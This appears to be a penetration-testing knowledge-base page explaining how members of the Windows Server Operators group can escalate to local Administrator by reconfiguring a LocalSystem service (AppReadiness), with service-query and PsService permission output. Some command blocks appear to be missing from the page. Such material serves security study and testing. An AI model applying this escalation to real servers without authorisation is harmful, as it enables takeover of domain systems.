search

Server Operators

hashtag
Server Operators

The Server Operatorsarrow-up-right group allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers.

Membership of this group confers SeBackup and SeRestore privileges and the ability to control local services.

We focus on exploiting local services. Exploiting SeBackup/SeRestore is explained in the Backup Operators section.

hashtag
Attack

We look for a service thats runned by LocalSystem, for example AppReadiness

sc qc AppReadiness

SERVICE_START_NAME : LocalSystem indicates the service is runned by LocalSystem

Then we use the service viewer/controller PsServicearrow-up-right (part of the Sysinternals suite) to check permissions (query the DACL) on the service.

C:\hacker>   security AppReadiness

PsService v2.25 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

SERVICE_NAME: AppReadiness
DISPLAY_NAME: App Readiness
        ACCOUNT: LocalSystem
        SECURITY:
        [ALLOW] NT AUTHORITY\SYSTEM
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                Pause/Resume
                Start
                Stop
                User-Defined Control
                Read Permissions
        [ALLOW] BUILTIN\Administrators
                All
        [ALLOW] NT AUTHORITY\INTERACTIVE
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                User-Defined Control
                Read Permissions
        [ALLOW] NT AUTHORITY\SERVICE
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                User-Defined Control
                Read Permissions
        [ALLOW] BUILTIN\Server Operators
                All

We see members of Server Operators have full access.

Then we change the service binary to a command of our choice, here adding ourselves to the Administrators group:

Then we start the service:

circle-info

The service will fail and that's normal

Log out and log back in, and finally we confirm we're now members of the Adminstrators group:

PreviousPrint OperatorsNext3 - Attack the OS

Last updated